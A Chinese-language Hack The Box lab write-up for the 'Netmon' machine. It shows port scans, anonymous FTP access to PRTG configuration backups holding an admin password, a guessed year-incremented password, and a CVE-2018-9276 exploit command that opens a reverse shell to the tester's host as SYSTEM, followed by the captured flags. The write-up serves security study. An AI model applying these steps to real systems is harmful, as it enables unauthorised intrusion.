Netmon-htb-writeup

0x00 靶场技能介绍

章节技能:匿名FTP访问、PRTG Network Monitor备份文件下载、密码规律识别、CVE-2018-9276

参考链接:无

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.152

2、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.152    
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-20 23:58 CST
Warning: 10.10.10.152 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.152
Host is up (0.29s latency).
Not shown: 65338 closed tcp ports (reset), 184 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 27.47 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 --min-rate=10000 -sC -sV 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 00:04 CST
Nmap scan report for 10.10.10.152
Host is up (0.50s latency).

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_11-10-23  10:20AM       <DIR>          Windows
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-05-20T08:00:46
|_  start_date: 2024-05-20T07:46:36
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -8h04m35s, deviation: 1s, median: -8h04m36s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.80 seconds

3、经过枚举,发现这直接可以通过匿名FTP服务,获取到第一个flag信息,而且是预期的获取方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp anonymous@10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50148|)
150 Opening ASCII mode data connection.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
11-10-23  10:20AM       <DIR>          Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50151|)
150 Opening ASCII mode data connection.
02-25-19  11:44PM       <DIR>          Administrator
01-15-24  11:03AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50159|)
150 Opening ASCII mode data connection.
01-15-24  11:03AM       <DIR>          Desktop
02-03-19  08:05AM       <DIR>          Documents
07-16-16  09:18AM       <DIR>          Downloads
07-16-16  09:18AM       <DIR>          Music
07-16-16  09:18AM       <DIR>          Pictures
07-16-16  09:18AM       <DIR>          Videos
226 Transfer complete.
ftp> cd Desktop
250 CWD command successful.
ftp> ls 
229 Entering Extended Passive Mode (|||50160|)
150 Opening ASCII mode data connection.
02-03-19  12:18AM                 1195 PRTG Enterprise Console.lnk
02-03-19  12:18AM                 1160 PRTG Network Monitor.lnk
05-20-24  03:47AM                   34 user.txt
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||50161|)
150 Opening ASCII mode data connection.
100% |*******************************************************************************************************************************************|    34        0.05 KiB/s    00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.05 KiB/s)
ftp> exit
221 Goodbye.
                                                                                      
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat user.txt                            
d4009d1ebd454aa898027a1ae7c10e4a

0x02 系统权限获取

4、开始访问80端口服务

http://10.10.10.152/index.htm

5、尝试网上的默认口令也不对,应该是修改了密码了,开始直接搜索可以未授权的RCE漏洞

https://github.com/A1vinSmith/CVE-2018-9276

https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data

%programdata%\Paessler\PRTG Network Monitor

6、经过初步的枚举,发现了一个压缩包文件,也获取到了里面的密文

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp anonymous@10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 

230 User logged in.
Remote system type is Windows_NT.
ftp> 
ftp> ls
229 Entering Extended Passive Mode (|||50252|)
150 Opening ASCII mode data connection.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
11-10-23  10:20AM       <DIR>          Windows
226 Transfer complete.
ftp> cd programdata
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50262|)
125 Data connection already open; Transfer starting.
12-15-21  10:40AM       <DIR>          Corefig
02-03-19  12:15AM       <DIR>          Licenses
11-20-16  10:36PM       <DIR>          Microsoft
02-03-19  12:18AM       <DIR>          Paessler
02-03-19  08:05AM       <DIR>          regid.1991-06.com.microsoft
07-16-16  09:18AM       <DIR>          SoftwareDistribution
02-03-19  12:15AM       <DIR>          TEMP
11-20-16  10:19PM       <DIR>          USOPrivate
11-20-16  10:19PM       <DIR>          USOShared
02-25-19  10:56PM       <DIR>          VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50272|)
150 Opening ASCII mode data connection.
05-20-24  05:10AM       <DIR>          PRTG Network Monitor
226 Transfer complete.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50273|)
150 Opening ASCII mode data connection.
08-18-23  08:20AM       <DIR>          Configuration Auto-Backups
05-20-24  05:10AM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
05-20-24  05:10AM       <DIR>          Logs (Web Server)
01-15-24  11:03AM       <DIR>          Monitoring Database
02-25-19  10:54PM              1189697 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
05-20-24  05:10AM              1647093 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.
ftp> cd "Configuration Auto-Backups"
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50285|)
150 Opening ASCII mode data connection.
08-18-23  08:20AM                64004 PRTG Configuration (Update to 18.1.37.13946).zip
226 Transfer complete.
ftp> get "PRTG Configuration (Update to 18.1.37.13946).zip"
local: PRTG Configuration (Update to 18.1.37.13946).zip remote: PRTG Configuration (Update to 18.1.37.13946).zip
229 Entering Extended Passive Mode (|||50315|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************************************************************| 64004       67.31 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 223 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
64004 bytes received in 00:00 (67.28 KiB/s)
ftp> 

                <login>
                  prtgadmin
                </login>
                <name>
                  PRTG System Administrator
                </name>
                <ownerid>
                  100
                </ownerid>
                <password>
                  <flags>
                    <encrypted/>
                  </flags>
                  <cell col="0" crypt="PRTG">
                    JO3Y7LLK7IBKCMDN3DABSVAQO5MR5IDWF3MJLDOWSA======
                  </cell>
                  <cell col="1" crypt="PRTG">
                    OEASMEIE74Q5VXSPFJA2EEGBMEUEXFWW
                  </cell>
                </password>

7、这里尝试使用 https://github.com/yobabyte/decryptocollection 工具去解密,发现无法解密。这里的VPN网是真的不行,太卡了,各种掉线。。。。。。。。。

8、换一个方法下载,图形目录下载,这里是根据上面的路径,进行获取配置文件

1
2
3
4
5
6
7
8
┌──(kali㉿offsec)-[~/Desktop/config]
└─$ tree      
.
├── PRTG Configuration.dat
├── PRTG Configuration.old
└── PRTG Configuration.old.bak

1 directory, 3 files

9、开始分析这些配置文件

PRTG Configuration.dat

PRTG Configuration.old

PRTG Configuration.old.bak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<!-- User: prtgadmin -->
PrTg@dmin2018



      <login>
          prtgadmin
        </login>
        <name>
          PRTG System Administrator
        </name>
        <ownerid>
          100
        </ownerid>
        <password>
          <flags>
            <encrypted/>
          </flags>
          <cell col="0" crypt="PRTG">
            PDWXMOPZT43U2GKGR3YCBILXDMLAUZVBN27KGBOPKXRQ====
          </cell>
          <cell col="1" crypt="PRTG">
            M24VKFRECBEGN3ZQNGSET723GFIPVHYX
          </cell>
        </password>

10、这里发现了明文的密码信息,尝试进行登录,但是失败了

1
2
user: prtgadmin
pwd: PrTg@dmin2018

11、经过分析,发现密码后面是年费结尾,结合靶机是2019年出的,是否可以递增一下进行尝试

1
2
prtgadmin
PrTg@dmin2019

http://10.10.10.152/welcome.htm

12、成功登录,那就直接上EXP了,不手动操作了

https://github.com/A1vinSmith/CVE-2018-9276

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 exp.py -i 10.10.10.152 -p 80 --lhost 10.10.14.45 --lport 443 --user prtgadmin --password PrTg@dmin2019
[+] [PRTG/18.1.37.13946] is Vulnerable!

[*] Exploiting [10.10.10.152:80] as [prtgadmin/PrTg@dmin2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] File staged at [C:\Users\Public\tester.txt] successfully with objid of [2018]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2018] staged for execution
[*] Generate msfvenom payload with [LHOST=10.10.14.45 LPORT=443 OUTPUT=/tmp/tbfvtymv.dll]
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
/home/kali/Desktop/exp.py:294: DeprecationWarning: setName() is deprecated, set the name attribute instead
  impacket.setName('Impacket')
/home/kali/Desktop/exp.py:295: DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead
  impacket.setDaemon(True)
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Hosting payload at [\\10.10.14.45\MMIRDVSR]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Command staged at [C:\Users\Public\tester.txt] successfully with objid of [2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2019] staged for execution
[*] Attempting to kill the impacket thread
[-] Impacket will maintain its own thread for active connections, so you may find it's still listening on <LHOST>:445!
[-] ps aux | grep <script name> and kill -9 <pid> if it is still running :)
[-] The connection will eventually time out.

[+] Listening on [10.10.14.45:443 for the reverse shell!]
listening on [any] 443 ...
[*] Incoming connection (10.10.10.152,50344)
[*] AUTHENTICATE_MESSAGE (\,NETMON)
[*] User NETMON\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.152] 50345
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system

13、不赖,这个EXP直接给提权了啊,那就读取最终的flag吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
C:\Windows\system32>cd C:/Users/Administrator/Desktop/
cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0EF5-E5E5

 Directory of C:\Users\Administrator\Desktop

02/03/2019  12:35 AM    <DIR>          .
02/03/2019  12:35 AM    <DIR>          ..
05/20/2024  08:21 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,732,656,640 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
38a3446085fad5ca871f1781548a758b

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/177

打靶记
#shooting-range
Netmon-htb-writeup
https://sh1yan.top/2024/05/21/Netmon-htb-writeup/
作者
shiyan
发布于
2024年5月21日
许可协议